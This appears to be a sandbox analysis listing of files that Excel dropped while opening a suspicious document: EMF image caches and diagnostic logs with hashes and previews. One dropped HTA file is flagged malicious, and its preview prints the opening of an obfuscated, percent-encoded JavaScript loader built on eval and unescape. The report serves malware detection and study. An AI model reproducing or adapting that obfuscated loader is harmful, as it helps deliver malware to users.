            Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4F07FD32.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Preview:....l...........................Z....G.. EMF....,R..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5001409A.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3147905270371765
            Encrypted:false
            SSDEEP:768:XOU4vnx1DW7ohBb66mQK4BTonxqQbApQK6c:+Xwc
            MD5:F53F71E570E920D3913A2409E0D66A1A
            SHA1:053B8885C3119D8DA7F89011364CE19C36DE5C8B
            SHA-256:75B6F7FE9C69E0559D930C2263972952AE2D3F9AFAF8D854971CE4830A567428
            SHA-512:FFA1BB2843BEE681ED9AB63BC9E580C37072D9A83C7DD8A0C688DBB50E4B2F1EC95C8397DCA631B9FDFE2FFBCB36D79435681C78E210DEE797F0CF25F0E78EDC
            Malicious:false
            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\530B4DBD.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):99352
            Entropy (8bit):2.3158027648425534
            Encrypted:false
            SSDEEP:768:hOk4vt1Dr7ohr86uA4K4BTonxqQbApQK6c:Uxwc
            MD5:5C0F792B289CBAED97B09A984FFF9B64
            SHA1:CE7C47BB0A1A65FEB5D82478A8B565C672CA2434
            SHA-256:A967B0F54AE3B4408ED75A7219EF8C8653D8D464F59865F286323DAE5B8EE1C9
            SHA-512:7D793D62373A12B3552DB533AE418F1B4E2151D0061D334593DCCA52A141516066656A51E8C74A73F9B578A1DF78FA29DD6C38BCB43276D13D75CEFD1E613C1E
            Malicious:false
            Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\56EB71AC.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44256
            Entropy (8bit):3.15066292565687
            Encrypted:false
            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
            MD5:F1EC2E98B0F577B675156B13DCF94105
            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
            Malicious:false
            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\667C6059.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):153152
            Entropy (8bit):2.344249846091516
            Encrypted:false
            SSDEEP:1536:MACQsA5DAtQaqrUPig97qG7bIQWkaYgJGXS:+5ZS
            MD5:37727D2936974D1B4DFDD4DA4BDFF6BE
            SHA1:4D5F14665F46E34F9BE183CDBB4CF74E1730A7F1
            SHA-256:12C4313220CCA2C2FE57BE8A74F1ADB505E9582F2FB0D3C9777F7C9A2DD8B16E
            SHA-512:E74F2D58453A88D048D5D992EF3390CB5CAC2D87FE965E09853CF66ABA2D711980F622BC3EFD27D3F5E3DA711D92E8EBAD3D68CE7C39D79B7820A5BC3CAB7634
            Malicious:false
            Preview:....l...........................Z....G.. EMF....@V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6D4CFCCF.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8303B702.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):1293620
            Entropy (8bit):4.563127917199792
            Encrypted:false
            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
            MD5:F71C973B5E362DFD6408D6C009E5643E
            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
            Malicious:false
            Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\88FCD5A3.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Preview:....l...........................Z....G.. EMF....,R..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9C1EE60.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8208
            Entropy (8bit):2.1323927537045475
            Encrypted:false
            SSDEEP:96:Eeg2s88nDfgQI5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:E/oxfWZ4V79FdigmR7qii1Bo
            MD5:82DD757FF4FF1D3FB246856330735809
            SHA1:06748CA102F41C7C670C68279E9E9F2549397B1F
            SHA-256:EFD000D3D939DB8AC89F5CAE10B435A270C4C4DA79C6D816A38390908467136A
            SHA-512:BF27EE9844489AF1A509D500A8B400C79BCCE59FE380E33B67565D213A65A7153B2E65128FFA73F55C1CBF0686DD5EE0BB4F8AD5345B71AFF5BAC80D7B3BC4E1
            Malicious:false
            Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B335AE1.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DED7A3D3.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):150296
            Entropy (8bit):2.363261587100385
            Encrypted:false
            SSDEEP:1536:cniojtkZQJYAkQDnGvVf1oLJknhmUI/Fuuo:KG4o
            MD5:7997F869414305613092678A07861221
            SHA1:24763405CDC204082E9226CE10A96F797AFBB348
            SHA-256:2742098FAA948D04A1E46BB05E81BCF6B3B478822094928B8E633A7A2781E432
            SHA-512:0631324512374BF7FBCF317965304281815A2CA9E172D78D1748CAB1ED5393670A9E88833F4FC0136912A7807434EACDF136F06A7844E46E79DDECCA3A1EDB11
            Malicious:false
            Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7CA436E.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44256
            Entropy (8bit):3.147465798679962
            Encrypted:false
            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
            Malicious:false
            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E9DA5084.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EC2BC78B.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EC4D8410.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EE22C30D.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F1E14097.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):109544
            Entropy (8bit):4.282675970330063
            Encrypted:false
            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
            Malicious:false
            Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FDC015AA.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\clearentirethingwithbestnoticetheeverythinggooodfrome[1].hta

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
            Category:dropped
            Size (bytes):8896
            Entropy (8bit):2.8657765287956245
            Encrypted:false
            SSDEEP:192:tHaCEZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7Mhr+ZK0IHj66666P:t1EZFxaTOum2oum2M5KUJDVUKhCbGVfa
            MD5:2BF5E317F05B0A3F39B92266C469A5D8
            SHA1:DD829CC323C541CCEA26AB725247525785437882
            SHA-256:B61D43BAEFFD194BB1739DF15E836BC034D54749AED194B97B95296E962CD345
            SHA-512:E3DC8E28A116842C09A95431C30429B403FD0D67C60851B1C4CC17EAF94BA62CF9555D98CC88B1FA55EEC3087B6FEAA53830A7E120615F3C9F17F222F356C8CB
            Malicious:true
            Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%61%25%33%36%25%36%31%25%36%34%25%33%38%25%33%32%25%36%35%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%38%25%33%31%25%33%35%25%33%34%25%33%36%25%33%30%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734339924283236800_98182420-D459-4EDE-B647-164EC7990E8A.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):8.112143835430977E-5
            Encrypted:false
            SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
            MD5:AFDEAC461EEC32D754D8E6017E845D21
            SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
            SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
            SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734339924283606200_98182420-D459-4EDE-B647-164EC7990E8A.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Additional\Additional1734340013837769600_06F6CC77-279A-49F0-A13B-293A9D9A52AD.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):71
            Entropy (8bit):4.3462513114457515
            Encrypted:false
            SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
            MD5:8F4510F128F81A8BAF2A345D00F7E30C
            SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
            SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
            SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734339924280557900_98182420-D459-4EDE-B647-164EC7990E8A.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with very long lines (28660), with CRLF line terminators
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.19850094939079865
            Encrypted:false
            SSDEEP:1536:sJEmqUqmG+jCCu1I9r01MfjdoTLq/JTjPLLc/I7TP18gJkOYs9mRjYkzpHecaMvn:JmmgCCf9OMauT7J1xv
            MD5:6354E2D969F46B3D85CF1AAB6ACC71B5
            SHA1:D56E8E62DF890066795A4B8E2B149B92BD1FD364
